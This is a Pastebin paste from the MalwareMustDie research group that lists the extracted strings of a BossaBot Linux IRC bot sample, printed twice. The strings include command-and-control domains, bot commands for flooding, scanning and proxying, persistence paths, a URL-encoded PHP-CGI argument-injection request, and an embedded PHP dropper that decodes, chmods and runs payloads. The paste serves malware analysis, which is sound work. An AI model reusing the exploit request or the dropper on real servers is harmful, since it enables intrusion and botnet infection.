API tools faq
paste
MalwareMustDie

#MMD BossaBot Latest sample

MalwareMustDie
Oct 3rd, 2014
403
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
MIX Assembler 18.46 KB | None | 0 0
raw download clone embed print report
  1. // #MalwareMustDie - Last version BossaBot sample (depacked)
  2. // VT: https://www.virustotal.com/en/file/0f0558ac7bca56a30689ada0b31a7887dbe8046af74fc66812852fb7f3beace7/analysis/1412321840/
  3. // sample 2 weeks old, attacks: 1 day old
  4. // pic: malekal
  5.  
  6. 0x00001    ELF
  7. 0x000F4    /lib/ld-linux.so.2
  8. 0x00114    GNU
  9. 0x00891    libpthread.so.0
  10. 0x008A1    waitpid
  11. 0x008A9    recv
  12. 0x008AE    connect
  13. 0x008B6    pthread_exit
  14. 0x008C3    pthread_create
  15. 0x008D2    send
  16. 0x008D7    accept
  17. 0x008DE    wait
  18. 0x008E3    fork
  19. 0x008E8    sigaction
  20. 0x008F2    __h_errno_location
  21. 0x00905    __errno_location
  22. 0x00916    _Jv_RegisterClasses
  23. 0x0092A    libc.so.6
  24. 0x00934    strcpy
  25. 0x0093B    ioctl
  26. 0x00941    stdout
  27. 0x00948    vsprintf
  28. 0x00951    snprintf
  29. 0x0095A    __strtol_internal
  30. 0x0096C    getpid
  31. 0x00973    fgets
  32. 0x00979    memcpy
  33. 0x00980    pclose
  34. 0x00987    perror
  35. 0x0098E    feof
  36. 0x00993    malloc
  37. 0x0099A    sleep
  38. 0x009A0    sysinfo
  39. 0x009A8    socket
  40. 0x009AF    select
  41. 0x009B6    fflush
  42. 0x009BD    alarm
  43. 0x009C3    popen
  44. 0x009C9    calloc
  45. 0x009D0    kill
  46. 0x009D5    bind
  47. 0x009DA    inet_addr
  48. 0x009E4    setsockopt
  49. 0x009EF    fseek
  50. 0x009F5    ferror
  51. 0x009FC    strstr
  52. 0x00A03    strncpy
  53. 0x00A0B    strcasecmp
  54. 0x00A16    __strdup
  55. 0x00A1F    bcopy
  56. 0x00A25    _IO_getc
  57. 0x00A2E    strtok
  58. 0x00A35    listen
  59. 0x00A3C    sscanf
  60. 0x00A43    fread
  61. 0x00A49    memset
  62. 0x00A50    ftell
  63. 0x00A56    srand
  64. 0x00A5C    getppid
  65. 0x00A64    time
  66. 0x00A69    getcwd
  67. 0x00A70    gethostbyname
  68. 0x00A7E    fclose
  69. 0x00A85    hstrerror
  70. 0x00A8F    fwrite
  71. 0x00A96    rewind
  72. 0x00A9D    inet_ntop
  73. 0x00AA7    fopen
  74. 0x00AAD    _IO_putc
  75. 0x00AB6    __ctype_toupper_loc
  76. 0x00ACA    _IO_stdin_used
  77. 0x00AD9    daemon
  78. 0x00AE0    __libc_start_main
  79. 0x00AF2    fputs
  80. 0x00AF8    vfprintf
  81. 0x00B01    free
  82. 0x00B06    __gmon_start__
  83. 0x00B15    GLIBC_2.1
  84. 0x00B1F    GLIBC_2.0
  85. 0x00B29    GLIBC_2.3
  86. 0x013A8    PTRh
  87. 0x013B5    QVh
  88. 0x01453    WVS
  89. 0x0154C    IQh
  90. 0x01563    WVS
  91. 0x015E6    G    -
  92. 0x01624    5~w=
  93. 0x0162F    6~l=
  94. 0x0163A    7~a=
  95. 0x01645    8~V=
  96. 0x01650    9~K=
  97. 0x01661    G    ]
  98. 0x01667    -~4=
  99. 0x01672    5~)=
  100. 0x016AB    WVS
  101. 0x016C7    tOVj
  102. 0x016CF    RPf
  103. 0x0181B    tP<
  104. 0x0182A    t7<
  105. 0x0187B    WVS
  106. 0x01895    XZh*
  107. 0x01904    SWj
  108. 0x01B43    QVP
  109. 0x01BD6    RVS
  110. 0x01BEF    IQS
  111. 0x01C8B    WVS
  112. 0x01EF7    WVS
  113. 0x02250    RSV
  114. 0x02267    WVS
  115. 0x022BD    C$f
  116. 0x022D9    Htl
  117. 0x0234C    S(RV
  118. 0x02360    S(R
  119. 0x02376    j.V
  120. 0x0238B    WVS
  121. 0x0241F    Z    P
  122. 0x0243B    Qh
  123. 0x02457    V(R
  124. 0x02561    V(R
  125. 0x0265F    WVS
  126. 0x0287B    WVS
  127. 0x02990    QSW
  128. 0x02A3F    WVS
  129. 0x02B23    4;V
  130. 0x02B30    tZC
  131. 0x02BDB    WVS
  132. 0x02CBF    4;V
  133. 0x02CCC    tZC
  134. 0x02D77    WVS
  135. 0x02E3F    t9Ku
  136. 0x02FC7    WVS
  137. 0x02FE8    QSV
  138. 0x030A7    PSh
  139. 0x03113    WVS
  140. 0x03133    : t
  141. 0x03144    CI9
  142. 0x03176    8!t"
  143. 0x0318D    CI9
  144. 0x03197    <;!u
  145. 0x031AA    8!t
  146. 0x03207    8 t'
  147. 0x03220    CI9
  148. 0x0322D    <3 u
  149. 0x03302    XZh
  150. 0x0340F    < t
  151. 0x0341E    CB9
  152. 0x0344D    <;
  153. 0x03462    CI9
  154. 0x034DC    8 t&
  155. 0x034F4    CI9
  156. 0x03501    <; u
  157. 0x0358E    WHP
  158. 0x035FF    WVS
  159. 0x03625    I9M
  160. 0x0362C    ; t"
  161. 0x03646    IC9M
  162. 0x0364E    ; u
  163. 0x03661    IC9M
  164. 0x0368B    ; t%
  165. 0x036A5    I9M
  166. 0x03702    I9M
  167. 0x03709    ; t!
  168. 0x03722    IC9M
  169. 0x0372A    ; u
  170. 0x0373D    IC9M
  171. 0x03767    ; t#
  172. 0x0377F    I9M
  173. 0x037A4    @t7
  174. 0x0380B    WVS
  175. 0x038B4    Rh!T
  176. 0x038F3     w@
  177. 0x0391D    jt6
  178. 0x03989    j    j
  179. 0x039DB    WVS
  180. 0x039F9    ZYh/
  181. 0x03A2E    _h*
  182. 0x03A3E    Y[h/
  183. 0x03A72    XZh
  184. 0x03AF9    PWhU
  185. 0x03B23    u&PSh
  186. 0x03B62    XZh]
  187. 0x03BB8    IQh_
  188. 0x03BE8    WIQj
  189. 0x03CCB    Q@P
  190. 0x03DA6    ;=H
  191. 0x03E8A    > t
  192. 0x03E9D    CI9
  193. 0x03EA4    <3 u
  194. 0x03F77    CI9
  195. 0x03F7E    <3 u
  196. 0x03FFF    WVS
  197. 0x040FF    WVS1
  198. 0x0418A    VS1
  199. 0x042EB    WVS
  200. 0x04306    XZh/
  201. 0x04316    WPV
  202. 0x0433F    WVS
  203. 0x0435B    Xh/
  204. 0x0436A    WPV
  205. 0x043CE    PRh
  206. 0x04487    WVS
  207. 0x044A9    :!t#
  208. 0x044C1    I9M
  209. 0x044F1    8:t2
  210. 0x045E8    srv5050.co
  211. 0x045F3    ka3ek.com
  212. 0x045FD    ircqfrum.com
  213. 0x0460A    8rb.su
  214. 0x04611    %s : USERID : UNIX : %s
  215. 0x0462D    /tmp/ReV1112.z
  216. 0x0463C    /tmp/ReV11122.z
  217. 0x0464C    /cgi-bin/php
  218. 0x04659    /cgi-bin/php5
  219. 0x04667    /cgi-bin/php-cgi
  220. 0x04678    /cgi-bin/php5-cgi
  221. 0x0468A    /cgi-bin/php-cgi.bin
  222. 0x0469F    /tmp
  223. 0x046A4    NOTICE %s :EX %s T %s
  224. 0x046BB    NOTICE %s :rnd %s t %s t %s
  225. 0x046D8    %d.%d.%d.%d
  226. 0x046E4    NOTICE %s :WT
  227. 0x046F3    NOTICE %s :SD
  228. 0x04702    NOTICE %s :rnd2 %s t %s t %s
  229. 0x04720    %hu.%hu.%hu.%hu
  230. 0x04730    NOTICE %s :S5 %d
  231. 0x04742    b64:000:Invalid Message Code.
  232. 0x04760    GET %s HTTP/1.0
  233. 0x04774    NOTICE %s :request=[%s]
  234. 0x0478D    close error
  235. 0x04799    WEBDOS
  236. 0x047A0    SERVER
  237. 0x047A7    SCANRND
  238. 0x047AF    SCANRND2
  239. 0x047B8    MOVE
  240. 0x047BD    SOCKS5
  241. 0x047C4    IRC
  242. 0x047C9    NOTICE %s :Unable to comply.
  243. 0x047E7    SH
  244. 0x047EB    NOTICE %s :%s
  245. 0x047FA    352
  246. 0x047FE    376
  247. 0x04802    433
  248. 0x04806    422
  249. 0x0480A    PRIVMSG
  250. 0x04812    PING
  251. 0x04817    NICK
  252. 0x0481C    TOPIC
  253. 0x04822    /tmp/ReV1112
  254. 0x04832    /tmp/ReV11122
  255. 0x04840    /etc/init.d/rc.local
  256. 0x04855    "%s%s"
  257. 0x0485F    -bash
  258. 0x04865    #rev
  259. 0x0486D    ERROR
  260. 0x04873    /etc/rc.conf
  261. 0x04880    NOTICE %s :MOVE <server>
  262. 0x0489A    MODE %s -x
  263. 0x048A6    MODE %s +i
  264. 0x048B2    JOIN %s :%s
  265. 0x048BF    WHO %s
  266. 0x048C7    PONG %s
  267. 0x048E0    POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%7%6E HTTP/10x04CBF   0x04CBF    Host: %s
  268. 0x04CC9    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
  269. 0x04D18    Content-Type: application/x-www-form-urlencoded
  270. 0x04D49    Content-Length: %d
  271. 0x04D5D    Connection: close
  272. 0x04D80    <?php
  273. 0x04D86    $bufferf = '%s';
  274. 0x04D97    $bufferf2 = '%s';
  275. 0x075A9    LCJbXDJUY3BGbG9vZCBGaW5pc2hlZCFcMl06IENvbmZpZyAtCiAKJHBhY2tldHMgcGFjb3RlcyBwYXJhICRob3N0OiRwb3J0LiIpOwp9Cn0KIAokYm90ID0gbmV3IHBCb3Q7CiRib3QtPnN0YXJ0KCk7CiAKPz4K';
  276. 0x0764C    $Vdkqrxiiyr3t = sys_get_temp_dir();
  277. 0x07670    $Vgxl4ifsipo5 = getcwd();
  278. 0x0768A    $Vos03apkyec1 = "ReV1112";
  279. 0x076A5    $Vos03apkyec2 = "ReV11122";
  280. 0x076C1    $Vos03apkyec3 = "WOP";
  281. 0x076D8    $V5lgt4awdv3b = "chmod 777";
  282. 0x076F5    $V5lgt4awdv3c = "php";
  283. 0x0770C    if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))
  284. 0x07741    exit(1);
  285. 0x0774A    }else{
  286. 0x07751    echo($Vdkqrxiiyr3t);
  287. 0x07766    $bufferf = base64_decode($bufferf);
  288. 0x0778A    $bufferf2 = base64_decode($bufferf2);
  289. 0x077B0    $wop = base64_decode($wop);
  290. 0x077CC    file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);
  291. 0x07808    file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);
  292. 0x07845    file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec3", $wop);
  293. 0x0787D    chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);
  294. 0x078AB    system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");
  295. 0x078E7    chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);
  296. 0x07915    system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");
  297. 0x07951    system($Vdkqrxiiyr3t . "/$Vos03apkyec2");
  298. 0x0797B    system($Vdkqrxiiyr3t . "/$Vos03apkyec1");
  299. 0x079A5    system("$V5lgt4awdv3c " . $Vdkqrxiiyr3t . "/$Vos03apkyec3");
  300. 0x079E2    exit(1);
  301. 0x07A00    b64:001:Syntax Error -- check help (-h) for usage.
  302. 0x07A40    b64:002:File Error Opening/Creating Files.
  303. 0x07A80    b64:003:File I/O Error -- Note: output file not removed.
  304. 0x07AC0    b64:004:Error on output file close.
  305. 0x07B00    b64:005:linesize set to minimum.
  306. 0x07B40    b64:006:Syntax: Too many arguments.
  307. 0x07B80    gethostbyname() error for host:%s:%s
  308. 0x07BC0    export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
  309. 0x07C00    NICK %s
  310. 0x07C08    USER %s localhost localhost :%s
  311. 0x07C3F    >ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  312. 0x07CA0    |$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]
  313. 0x07CDF    abcdefghijklmnopq
  314. 0x08341    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  315. 0x08374    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  316. 0x083A7    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  317. 0x083DA    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  318. 0x0840D    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  319. 0x08440    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  320. 0x08473    .shstrtab
  321. 0x0847D    .interp
  322. 0x08485    .note.ABI-tag
  323. 0x08493    .hash
  324. 0x08499    .dynsym
  325. 0x084A1    .dynstr
  326. 0x084A9    .gnu.version
  327. 0x084B6    .gnu.version_r
  328. 0x084C5    .rel.dyn
  329. 0x084CE    .rel.plt
  330. 0x084D7    .init
  331. 0x084DD    .text
  332. 0x084E3    .fini
  333. 0x084E9    .rodata
  334. 0x084F1    .eh_frame
  335. 0x084FB    .data
  336. 0x08501    .dynamic
  337. 0x0850A    .ctors
  338. 0x08511    .dtors
  339. 0x08518    .jcr
  340. 0x0851D    .got
  341. 0x08522    .bss
  342. 0x08527    .comment
  343. 0x00001    ELF
  344. 0x000F4    /lib/ld-linux.so.2
  345. 0x00114    GNU
  346. 0x00891    libpthread.so.0
  347. 0x008A1    waitpid
  348. 0x008A9    recv
  349. 0x008AE    connect
  350. 0x008B6    pthread_exit
  351. 0x008C3    pthread_create
  352. 0x008D2    send
  353. 0x008D7    accept
  354. 0x008DE    wait
  355. 0x008E3    fork
  356. 0x008E8    sigaction
  357. 0x008F2    __h_errno_location
  358. 0x00905    __errno_location
  359. 0x00916    _Jv_RegisterClasses
  360. 0x0092A    libc.so.6
  361. 0x00934    strcpy
  362. 0x0093B    ioctl
  363. 0x00941    stdout
  364. 0x00948    vsprintf
  365. 0x00951    snprintf
  366. 0x0095A    __strtol_internal
  367. 0x0096C    getpid
  368. 0x00973    fgets
  369. 0x00979    memcpy
  370. 0x00980    pclose
  371. 0x00987    perror
  372. 0x0098E    feof
  373. 0x00993    malloc
  374. 0x0099A    sleep
  375. 0x009A0    sysinfo
  376. 0x009A8    socket
  377. 0x009AF    select
  378. 0x009B6    fflush
  379. 0x009BD    alarm
  380. 0x009C3    popen
  381. 0x009C9    calloc
  382. 0x009D0    kill
  383. 0x009D5    bind
  384. 0x009DA    inet_addr
  385. 0x009E4    setsockopt
  386. 0x009EF    fseek
  387. 0x009F5    ferror
  388. 0x009FC    strstr
  389. 0x00A03    strncpy
  390. 0x00A0B    strcasecmp
  391. 0x00A16    __strdup
  392. 0x00A1F    bcopy
  393. 0x00A25    _IO_getc
  394. 0x00A2E    strtok
  395. 0x00A35    listen
  396. 0x00A3C    sscanf
  397. 0x00A43    fread
  398. 0x00A49    memset
  399. 0x00A50    ftell
  400. 0x00A56    srand
  401. 0x00A5C    getppid
  402. 0x00A64    time
  403. 0x00A69    getcwd
  404. 0x00A70    gethostbyname
  405. 0x00A7E    fclose
  406. 0x00A85    hstrerror
  407. 0x00A8F    fwrite
  408. 0x00A96    rewind
  409. 0x00A9D    inet_ntop
  410. 0x00AA7    fopen
  411. 0x00AAD    _IO_putc
  412. 0x00AB6    __ctype_toupper_loc
  413. 0x00ACA    _IO_stdin_used
  414. 0x00AD9    daemon
  415. 0x00AE0    __libc_start_main
  416. 0x00AF2    fputs
  417. 0x00AF8    vfprintf
  418. 0x00B01    free
  419. 0x00B06    __gmon_start__
  420. 0x00B15    GLIBC_2.1
  421. 0x00B1F    GLIBC_2.0
  422. 0x00B29    GLIBC_2.3
  423. 0x013A8    PTRh
  424. 0x013B5    QVh
  425. 0x01453    WVS
  426. 0x0154C    IQh
  427. 0x01563    WVS
  428. 0x015E6    G    -
  429. 0x01624    5~w=
  430. 0x0162F    6~l=
  431. 0x0163A    7~a=
  432. 0x01645    8~V=
  433. 0x01650    9~K=
  434. 0x01661    G    ]
  435. 0x01667    -~4=
  436. 0x01672    5~)=
  437. 0x016AB    WVS
  438. 0x016C7    tOVj
  439. 0x016CF    RPf
  440. 0x0181B    tP<
  441. 0x0182A    t7<
  442. 0x0187B    WVS
  443. 0x01895    XZh*
  444. 0x01904    SWj
  445. 0x01B43    QVP
  446. 0x01BD6    RVS
  447. 0x01BEF    IQS
  448. 0x01C8B    WVS
  449. 0x01EF7    WVS
  450. 0x02250    RSV
  451. 0x02267    WVS
  452. 0x022BD    C$f
  453. 0x022D9    Htl
  454. 0x0234C    S(RV
  455. 0x02360    S(R
  456. 0x02376    j.V
  457. 0x0238B    WVS
  458. 0x0241F    Z    P
  459. 0x0243B    Qh
  460. 0x02457    V(R
  461. 0x02561    V(R
  462. 0x0265F    WVS
  463. 0x0287B    WVS
  464. 0x02990    QSW
  465. 0x02A3F    WVS
  466. 0x02B23    4;V
  467. 0x02B30    tZC
  468. 0x02BDB    WVS
  469. 0x02CBF    4;V
  470. 0x02CCC    tZC
  471. 0x02D77    WVS
  472. 0x02E3F    t9Ku
  473. 0x02FC7    WVS
  474. 0x02FE8    QSV
  475. 0x030A7    PSh
  476. 0x03113    WVS
  477. 0x03133    : t
  478. 0x03144    CI9
  479. 0x03176    8!t"
  480. 0x0318D    CI9
  481. 0x03197    <;!u
  482. 0x031AA    8!t
  483. 0x03207    8 t'
  484. 0x03220    CI9
  485. 0x0322D    <3 u
  486. 0x03302    XZh
  487. 0x0340F    < t
  488. 0x0341E    CB9
  489. 0x0344D    <;
  490. 0x03462    CI9
  491. 0x034DC    8 t&
  492. 0x034F4    CI9
  493. 0x03501    <; u
  494. 0x0358E    WHP
  495. 0x035FF    WVS
  496. 0x03625    I9M
  497. 0x0362C    ; t"
  498. 0x03646    IC9M
  499. 0x0364E    ; u
  500. 0x03661    IC9M
  501. 0x0368B    ; t%
  502. 0x036A5    I9M
  503. 0x03702    I9M
  504. 0x03709    ; t!
  505. 0x03722    IC9M
  506. 0x0372A    ; u
  507. 0x0373D    IC9M
  508. 0x03767    ; t#
  509. 0x0377F    I9M
  510. 0x037A4    @t7
  511. 0x0380B    WVS
  512. 0x038B4    Rh!T
  513. 0x038F3     w@
  514. 0x0391D    jt6
  515. 0x03989    j    j
  516. 0x039DB    WVS
  517. 0x039F9    ZYh/
  518. 0x03A2E    _h*
  519. 0x03A3E    Y[h/
  520. 0x03A72    XZh
  521. 0x03AF9    PWhU
  522. 0x03B23    u&PSh
  523. 0x03B62    XZh]
  524. 0x03BB8    IQh_
  525. 0x03BE8    WIQj
  526. 0x03CCB    Q@P
  527. 0x03DA6    ;=H
  528. 0x03E8A    > t
  529. 0x03E9D    CI9
  530. 0x03EA4    <3 u
  531. 0x03F77    CI9
  532. 0x03F7E    <3 u
  533. 0x03FFF    WVS
  534. 0x040FF    WVS1
  535. 0x0418A    VS1
  536. 0x042EB    WVS
  537. 0x04306    XZh/
  538. 0x04316    WPV
  539. 0x0433F    WVS
  540. 0x0435B    Xh/
  541. 0x0436A    WPV
  542. 0x043CE    PRh
  543. 0x04487    WVS
  544. 0x044A9    :!t#
  545. 0x044C1    I9M
  546. 0x044F1    8:t2
  547. 0x045E8    srv5050.co
  548. 0x045F3    ka3ek.com
  549. 0x045FD    ircqfrum.com
  550. 0x0460A    8rb.su
  551. 0x04611    %s : USERID : UNIX : %s
  552. 0x0462D    /tmp/ReV1112.z
  553. 0x0463C    /tmp/ReV11122.z
  554. 0x0464C    /cgi-bin/php
  555. 0x04659    /cgi-bin/php5
  556. 0x04667    /cgi-bin/php-cgi
  557. 0x04678    /cgi-bin/php5-cgi
  558. 0x0468A    /cgi-bin/php-cgi.bin
  559. 0x0469F    /tmp
  560. 0x046A4    NOTICE %s :EX %s T %s
  561. 0x046BB    NOTICE %s :rnd %s t %s t %s
  562. 0x046D8    %d.%d.%d.%d
  563. 0x046E4    NOTICE %s :WT
  564. 0x046F3    NOTICE %s :SD
  565. 0x04702    NOTICE %s :rnd2 %s t %s t %s
  566. 0x04720    %hu.%hu.%hu.%hu
  567. 0x04730    NOTICE %s :S5 %d
  568. 0x04742    b64:000:Invalid Message Code.
  569. 0x04760    GET %s HTTP/1.0
  570. 0x04774    NOTICE %s :request=[%s]
  571. 0x0478D    close error
  572. 0x04799    WEBDOS
  573. 0x047A0    SERVER
  574. 0x047A7    SCANRND
  575. 0x047AF    SCANRND2
  576. 0x047B8    MOVE
  577. 0x047BD    SOCKS5
  578. 0x047C4    IRC
  579. 0x047C9    NOTICE %s :Unable to comply.
  580. 0x047E7    SH
  581. 0x047EB    NOTICE %s :%s
  582. 0x047FA    352
  583. 0x047FE    376
  584. 0x04802    433
  585. 0x04806    422
  586. 0x0480A    PRIVMSG
  587. 0x04812    PING
  588. 0x04817    NICK
  589. 0x0481C    TOPIC
  590. 0x04822    /tmp/ReV1112
  591. 0x04832    /tmp/ReV11122
  592. 0x04840    /etc/init.d/rc.local
  593. 0x04855    "%s%s"
  594. 0x0485F    -bash
  595. 0x04865    #rev
  596. 0x0486D    ERROR
  597. 0x04873    /etc/rc.conf
  598. 0x04880    NOTICE %s :MOVE <server>
  599. 0x0489A    MODE %s -x
  600. 0x048A6    MODE %s +i
  601. 0x048B2    JOIN %s :%s
  602. 0x048BF    WHO %s
  603. 0x048C7    PONG %s
  604. 0x048E0    POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%7%6E HTTP/10x04CBF   0x04CBF    Host: %s
  605. 0x04CC9    User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
  606. 0x04D18    Content-Type: application/x-www-form-urlencoded
  607. 0x04D49    Content-Length: %d
  608. 0x04D5D    Connection: close
  609. 0x04D80    <?php
  610. 0x04D86    $bufferf = '%s';
  611. 0x04D97    $bufferf2 = '%s';
  612. 0x075A9    LCJbXDJUY3BGbG9vZCBGaW5pc2hlZCFcMl06IENvbmZpZyAtCiAKJHBhY2tldHMgcGFjb3RlcyBwYXJhICRob3N0OiRwb3J0LiIpOwp9Cn0KIAokYm90ID0gbmV3IHBCb3Q7CiRib3QtPnN0YXJ0KCk7CiAKPz4K';
  613. 0x0764C    $Vdkqrxiiyr3t = sys_get_temp_dir();
  614. 0x07670    $Vgxl4ifsipo5 = getcwd();
  615. 0x0768A    $Vos03apkyec1 = "ReV1112";
  616. 0x076A5    $Vos03apkyec2 = "ReV11122";
  617. 0x076C1    $Vos03apkyec3 = "WOP";
  618. 0x076D8    $V5lgt4awdv3b = "chmod 777";
  619. 0x076F5    $V5lgt4awdv3c = "php";
  620. 0x0770C    if (file_exists($Vdkqrxiiyr3t . "/$Vos03apkyec2"))
  621. 0x07741    exit(1);
  622. 0x0774A    }else{
  623. 0x07751    echo($Vdkqrxiiyr3t);
  624. 0x07766    $bufferf = base64_decode($bufferf);
  625. 0x0778A    $bufferf2 = base64_decode($bufferf2);
  626. 0x077B0    $wop = base64_decode($wop);
  627. 0x077CC    file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec1", $bufferf);
  628. 0x07808    file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec2", $bufferf2);
  629. 0x07845    file_put_contents("$Vdkqrxiiyr3t/$Vos03apkyec3", $wop);
  630. 0x0787D    chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec1,0777);
  631. 0x078AB    system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec1");
  632. 0x078E7    chmod ($Vdkqrxiiyr3t."/".$Vos03apkyec2,0777);
  633. 0x07915    system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");
  634. 0x07951    system($Vdkqrxiiyr3t . "/$Vos03apkyec2");
  635. 0x0797B    system($Vdkqrxiiyr3t . "/$Vos03apkyec1");
  636. 0x079A5    system("$V5lgt4awdv3c " . $Vdkqrxiiyr3t . "/$Vos03apkyec3");
  637. 0x079E2    exit(1);
  638. 0x07A00    b64:001:Syntax Error -- check help (-h) for usage.
  639. 0x07A40    b64:002:File Error Opening/Creating Files.
  640. 0x07A80    b64:003:File I/O Error -- Note: output file not removed.
  641. 0x07AC0    b64:004:Error on output file close.
  642. 0x07B00    b64:005:linesize set to minimum.
  643. 0x07B40    b64:006:Syntax: Too many arguments.
  644. 0x07B80    gethostbyname() error for host:%s:%s
  645. 0x07BC0    export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
  646. 0x07C00    NICK %s
  647. 0x07C08    USER %s localhost localhost :%s
  648. 0x07C3F    >ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
  649. 0x07CA0    |$$$}rstuvwxyz{$$$$$$$>?@ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]
  650. 0x07CDF    abcdefghijklmnopq
  651. 0x08341    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  652. 0x08374    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  653. 0x083A7    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  654. 0x083DA    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  655. 0x0840D    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  656. 0x08440    GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  657. 0x08473    .shstrtab
  658. 0x0847D    .interp
  659. 0x08485    .note.ABI-tag
  660. 0x08493    .hash
  661. 0x08499    .dynsym
  662. 0x084A1    .dynstr
  663. 0x084A9    .gnu.version
  664. 0x084B6    .gnu.version_r
  665. 0x084C5    .rel.dyn
  666. 0x084CE    .rel.plt
  667. 0x084D7    .init
  668. 0x084DD    .text
  669. 0x084E3    .fini
  670. 0x084E9    .rodata
  671. 0x084F1    .eh_frame
  672. 0x084FB    .data
  673. 0x08501    .dynamic
  674. 0x0850A    .ctors
  675. 0x08511    .dtors
  676. 0x08518    .jcr
  677. 0x0851D    .got
  678. 0x08522    .bss
  679. 0x08527    .comment
  680.  
  681. ---
  682. #MalwareMustDie!
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!